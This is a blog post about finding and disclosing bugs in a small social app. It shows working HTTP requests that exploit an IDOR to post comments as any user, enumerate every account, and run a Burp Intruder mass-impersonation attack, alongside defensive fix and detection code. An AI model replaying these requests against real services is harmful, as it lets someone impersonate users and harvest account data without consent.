In this blog post, I’ll take you on my first journey into the world of mobile application security through a bizarre yet real app called The Social Nedwork, a niche social media platform where only people named Ned can post. Armed with curiosity, an old iPhone, and minimal prior experience, I discovered vulnerabilities, responsibly disclosed them, and learned an incredible amount along the way.

This adventure started an unassuming Thursday evening when I came home from work to find my family hanging out. I walked through the door to hear my cousin say, “Ned, I’ve got the app for you!” Confused, I opened the App Store to discover the majesty of the Social Nedwork.

The Nedwork is a Twitter clone whose tagline reads:

“Are you a Ned who never really felt like you had a place to share your thoughts? Or a non-Ned who felt out of touch with what Neds are talking about? Worry no more! The Social Nedwork is the new revolutionary social app where only Neds can post! You need to be a verified Ned to post, but all users can like, comment, and just generally hang out on the Social Nedwork.”

Amused, I registered an account, and immediately my spidey senses started tingling.

HTTP Request:

GET /profile/self_details HTTP/2
Host: social-nedwork.onrender.com
[TRUNCATED]

HTTP Response:

HTTP/2 200 OK
[TRUNCATED]

{
  "id":"57a301f4-7c75-4694-a70a-81b2b249f457",
  "updated_at":"2025-03-08T14:31:12.615Z",
  "username":"57a301f4-7c75-4694-a70a-81b2b249f457",
  "full_name":"nedpfeiffer",
  [TRUNCATED]
}

By default, newly created accounts had their username set to a random GUID, shown in the previous HTTP request and response but also visible in the app UI. I got the sense that the application was likely vibe-coded with AI, and that typically means authorization vulnerabilities.

After exploring the app functionality a bit, I got intrigued by the comment feature.

HTTP Request:

POST /comments/post_comment HTTP/2
Host: social-nedwork.onrender.com
[TRUNCATED]

{
  "postId":"2a6755ba-c5ee-401a-b9bb-11593cf8f5cd",
  "userId":"f864964a-3b0c-4e7d-bb48-7adc433ec543",
  "content":"Couldn’t have put it better myself"
}

HTTP Response:

HTTP/2 200 OK
[TRUNCATED]

{
  "id":"135ac9b3-9304-4245-8482-1a482464584b",
  "created_at":"2025-03-08T16:49:36.035Z",
  "user_id":"f864964a-3b0c-4e7d-bb48-7adc433ec543",
  "post_id":"2a6755ba-c5ee-401a-b9bb-11593cf8f5cd",
  "content":"Couldn’t have put it better myself",
  "reply_comment_id":null,
  "user":{
    "id":"f864964a-3b0c-4e7d-bb48-7adc433ec543",
    "username":"f864964a-3b0c-4e7d-bb48-7adc433ec543",
    "avatar_url":"https://storage.googleapis.com/nedwork_storage/assets/default_profile_pic.webp"
  }
}

The comment request passes a userId parameter in the POST body, which seemed unnecessary: the app should be able to attribute the comment to me from my JWT session token alone. What if we created a second account and then impersonated our original account by passing the original userId in the request?

HTTP Request:

POST /comments/post_comment HTTP/2
Host: social-nedwork.onrender.com
[TRUNCATED]

{
  "postId":"2a6755ba-c5ee-401a-b9bb-11593cf8f5cd",
  "userId":"57a301f4-7c75-4694-a70a-81b2b249f457",
  "content":"Insecure direct object reference (IDOR) is a type of access control vulnerability in digital security. This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication. "
}

HTTP Response:

HTTP/2 200 OK
[TRUNCATED]

{
  "id":"0b43f656-80aa-4e09-aa64-fff6d85a6ba2",
  "created_at":"2025-03-08T16:53:42.982Z",
  "user_id":"57a301f4-7c75-4694-a70a-81b2b249f457",
  "post_id":"2a6755ba-c5ee-401a-b9bb-11593cf8f5cd",
  "content":"Insecure direct object reference (IDOR) is a type of access control vulnerability in digital security. This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication.",
  "reply_comment_id":null,
  "user":{
    "id":"57a301f4-7c75-4694-a70a-81b2b249f457",
    "username":"nedpfeiffer",
    "avatar_url":"https://storage.googleapis.com/nedwork_storage/assets/default_profile_pic.webp"
  }
}

Uh oh. As suspected, the userId parameter is susceptible to IDOR, allowing me to post comments as any user, including the admin. Typically this is where I would stop and notify the vendor, but because the creator was a family friend I decided to have a little fun.
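To make the bug and its fix concrete, here is an added example (my own illustration, not the Nedwork's actual backend code) of the two ways a comment handler can decide who the author is. The session token is a stand-in HS256 JWT verified with the standard library; the secret, user ids and post ids are constructed placeholders. The vulnerable handler verifies the token and then trusts body["userId"] anyway, which is exactly the behaviour seen in the requests above; the fixed handler takes the author from the token's subject and rejects a body that claims someone else.

```python
import base64
import hashlib
import hmac
import json
import uuid

# Constructed server-side signing secret (assumption; a real service loads it from config).
JWT_SECRET = b"example-secret-not-the-real-one"


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def issue_token(user_id: str) -> str:
    """Mint an HS256 JWT whose subject is the authenticated user (helper for the demo)."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps({"sub": user_id}).encode())
    sig = hmac.new(JWT_SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_token(token: str) -> str:
    """Return the subject of a correctly signed HS256 token; raise on anything else."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    if json.loads(_b64url_decode(header_b64)).get("alg") != "HS256":
        raise ValueError("unexpected alg")  # never let the client pick the algorithm
    expected = hmac.new(JWT_SECRET, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(payload_b64))["sub"]


def post_comment_vulnerable(token: str, body: dict) -> dict:
    """Mirrors the observed behaviour: authentication happens, authorization does not.
    The comment is attributed to whatever userId the client put in the body."""
    verify_token(token)
    return {
        "id": str(uuid.uuid4()),
        "user_id": body["userId"],  # client-controlled author -> IDOR
        "post_id": body["postId"],
        "content": body["content"],
    }


def post_comment_fixed(token: str, body: dict) -> dict:
    """Attribute the comment to the token's subject. A body that names a different
    user is rejected rather than silently corrected, so the attempt is visible in logs."""
    auth_user_id = verify_token(token)
    if body.get("userId", auth_user_id) != auth_user_id:
        raise PermissionError("userId does not match the session subject")
    return {
        "id": str(uuid.uuid4()),
        "user_id": auth_user_id,  # server-derived author
        "post_id": body["postId"],
        "content": body["content"],
    }


if __name__ == "__main__":
    # Second account's session, body claiming the original account (constructed ids).
    token = issue_token("second-account")
    body = {"postId": "post-1", "userId": "original-account", "content": "hello"}
    print("vulnerable attributes to:", post_comment_vulnerable(token, body)["user_id"])
    try:
        post_comment_fixed(token, body)
    except PermissionError as exc:
        print("fixed rejects:", exc)
```

The design point is that the fixed handler never needs a userId from the client at all; keeping the field optional-but-checked (instead of ignoring it) means a mismatch turns into a 403 that a detection rule can count, rather than disappearing.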

I’d spent a good chunk of the weekend proxying and modifying requests to this obscure mobile app and I was getting pretty lonely. Let’s make myself the most popular Ned on the Social Nedwork!

First, we need to enumerate the UUIDs of every other user on the app. Fortunately for us, the search functionality allows us to do just that.

HTTP Request:

GET /search/profiles?user_id=57a301f4-7c75-4694-a70a-81b2b249f457&page_size=10000&page_number=1 HTTP/2
Host: social-nedwork.onrender.com
[TRUNCATED]

HTTP Response:

HTTP/2 200 OK
[TRUNCATED]

[
  {
    "id":"066934d4-b3f0-4e21-acf1-4cb5d3da6aaf",
    "updated_at":null,
    "username":"066934d4-b3f0-4e21-acf1-4cb5d3da6aaf",
    "full_name":"[REDACTED]",
    "avatar_url":"https://storage.googleapis.com/nedwork_storage/assets/default_profile_pic.webp",
    "bio":null,
    "ned_status":"NON_NED",
    "verification_hash":"124d91bc366372fcf53472eb2714abad33722a0112c75ac84803c293ee796201",
    "following_count":"1",
    "followers_count":"1",
    "is_following":false
  },
  {
    "id":"3560f44e-41c8-4d51-9055-23bef6e7e69c",
    "updated_at":null,
    "username":"3560f44e-41c8-4d51-9055-23bef6e7e69c",
    "full_name":"[REDACTED]",
    "avatar_url":"https://storage.googleapis.com/nedwork_storage/assets/default_profile_pic.webp",
    "bio":null,
    "ned_status":null,
    "verification_hash":null,
    "following_count":"0",
    "followers_count":"0",
    "is_following":false
  },
  [TRUNCATED]
  {
    "id":"2358d7d3-2431-4c88-85c0-87c76f4900fd",
    "updated_at":"2025-03-06T21:53:05.583Z",
    "username":"red_ned_redemption",
    "full_name":"Red Ned Redemption ",
    "avatar_url":"https://storage.googleapis.com/nedwork_storage/avatars/1741297983184_a98f2edd-b077-432d-851d-a7320c2a2cb5.jpg",
    "bio":"",
    "ned_status":null,
    "verification_hash":null,
    "following_count":"1",
    "followers_count":"1",
    "is_following":false
  }
]

After modifying the page_size parameter, I can see every user on the app and scrape a list of userIds. Then, after a simple Burp Intruder Pitchfork attack, I can make everyone comment on how funny my inaugural post on the Social Nedwork is.
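From the defender's side, the two things that made this mass-comment run possible were an uncapped page_size on /search/profiles (which also leaked verification_hash for every account) and a comment endpoint that accepted any userId. The following added example (my own, not the Nedwork's code) shows a server-side page clamp with a public-field whitelist for the search endpoint, plus two detection checks run over constructed JSON-lines request logs: one flags a session whose comment bodies claim many distinct userIds, the other flags search requests whose page_size exceeds the cap. The log format, field names, session ids and user ids are all assumptions I made up for the example.

```python
import json
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

MAX_PAGE_SIZE = 50
# Fields other users are allowed to see; verification_hash stays server-side.
PUBLIC_PROFILE_FIELDS = ("id", "username", "full_name", "avatar_url", "bio",
                         "ned_status", "following_count", "followers_count", "is_following")


def clamp_page(page_size, page_number):
    """Parse and bound pagination parameters instead of trusting them."""
    try:
        size, number = int(page_size), int(page_number)
    except (TypeError, ValueError):
        raise ValueError("page_size and page_number must be integers")
    if number < 1:
        raise ValueError("page_number starts at 1")
    return min(max(size, 1), MAX_PAGE_SIZE), number


def search_profiles(profiles, page_size, page_number):
    """Return one bounded page of profiles, projected onto public fields only."""
    size, number = clamp_page(page_size, page_number)
    start = (number - 1) * size
    return [{k: p.get(k) for k in PUBLIC_PROFILE_FIELDS} for p in profiles[start:start + size]]


# Constructed request log: one record per line; "sub" is the token subject,
# "body_user_id" is the userId the client sent (null when not applicable).
SAMPLE_LOG = "\n".join(
    ['{"ts":"2025-03-08T16:53:%02dZ","sub":"sess-A","method":"GET",'
     '"path":"/search/profiles?user_id=sess-A&page_size=10000&page_number=1","body_user_id":null}' % 0]
    + ['{"ts":"2025-03-08T16:54:%02dZ","sub":"sess-A","method":"POST",'
       '"path":"/comments/post_comment","body_user_id":"u%d"}' % (i, i) for i in range(1, 7)]
    + ['{"ts":"2025-03-08T16:55:00Z","sub":"sess-B","method":"POST",'
       '"path":"/comments/post_comment","body_user_id":"sess-B"}',
       '{"ts":"2025-03-08T16:55:01Z","sub":"sess-B","method":"GET",'
       '"path":"/search/profiles?user_id=sess-B&page_size=10&page_number=1","body_user_id":null}']
)


def _records(log_text):
    for line in log_text.splitlines():
        if line.strip():
            yield json.loads(line)


def find_impersonation_bursts(log_text, threshold=5):
    """Sessions whose comment bodies named at least `threshold` distinct other users."""
    claimed = defaultdict(set)
    for rec in _records(log_text):
        if rec["path"] == "/comments/post_comment":
            body_user = rec.get("body_user_id")
            if body_user and body_user != rec["sub"]:  # body identity != token identity
                claimed[rec["sub"]].add(body_user)
    return {sub: sorted(ids) for sub, ids in claimed.items() if len(ids) >= threshold}


def find_oversized_page_requests(log_text, limit=MAX_PAGE_SIZE):
    """(session, page_size) for search requests asking for more than the cap."""
    hits = []
    for rec in _records(log_text):
        parts = urlsplit(rec["path"])
        if parts.path == "/search/profiles":
            size = int(parse_qs(parts.query).get("page_size", ["0"])[0])
            if size > limit:
                hits.append((rec["sub"], size))
    return hits


if __name__ == "__main__":
    print("impersonation bursts:", find_impersonation_bursts(SAMPLE_LOG))
    print("oversized page requests:", find_oversized_page_requests(SAMPLE_LOG))
```

Note that `find_impersonation_bursts` only has something to count because the vulnerable server logged the body's userId alongside the token subject; once the comment endpoint derives the author from the token and returns 403 on a mismatch, the same rule can be pointed at the 403s instead.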

Intruder List:

That's so true!!
Omg relatable
ur so funny haha
imagine not being named Ned that'd be crazy
hahaha lmaooo
literally me fr
nahhh that's wild
stopppp u got me crying
omg u did NOT just say that
bro what
too real omg
i can't even rn
this took me OUT
nah bc why is this so accurate
screamingggg lmao
im in tears rn
no thoughts, just vibes
deadass tho
not u calling me out like this
bro u got me wheezing
why is this me lmao

Intruder Payload Positions:

POST /comments/post_comment HTTP/2
Host: social-nedwork.onrender.com
[TRUNCATED]

{
  "postId":"2a6755ba-c5ee-401a-b9bb-11593cf8f5cd",
  "userId":"§fd9023b2-0be0-443c-a478-32f25b242114§",
  "content":"§So true bestie!§"
}

And just like that, I was a viral micro-celebrity on the Social Nedwork.

After I had my fun, I called the creator and walked him through everything: the IDOR on userId, the ability to enumerate account information, and a handful of other low severity findings. What stuck with me is how ordinary the bugs were. No debuggers. No reverse engineering. Just intercepting traffic, asking “what happens if I change this?”, and seeing the server say “sure.”

My first dive into mobile app security started as a joke about a social network for Neds. It ended with a responsible disclosure, a fixed API, and a much better understanding of how often real vulnerabilities come down to fundamentals.